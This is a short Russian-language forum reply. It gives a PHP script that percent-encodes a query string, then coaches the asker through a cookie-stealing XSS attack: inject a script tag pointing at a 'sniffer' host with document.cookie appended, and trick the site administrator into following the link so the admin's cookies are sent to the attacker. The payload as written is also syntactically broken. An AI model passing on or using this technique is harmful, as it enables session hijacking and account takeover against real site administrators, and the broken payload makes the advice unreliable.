вот скрипт:
<?
$str = urldecode($_SERVER['QUERY_STRING']);
for($i=0;$i<strlen($str);$i++) {
$hex=dechex(ord($str[$i]));
if($str[$i]=='&')
echo "$str[$i]";
else
echo "%$hex";
}
?>
а насчёт твоего вопроса про xss.
что ты там пишешь? что тебя просекло?
ты не то пишешь, тебе надо вставить место твоего(<script>SHOW DATABASES;</script>)непонятно кода, ссылку на снифер, примерно так: <script src="http://tvoi_snifer?"+document.cookie;></script> где "http://tvoi_snifer"-адрес снифера, куда придут куки.
ну и дать ету ссылку админу, как он пройдёт по этой ссылке, к тебе на снифер придут куки.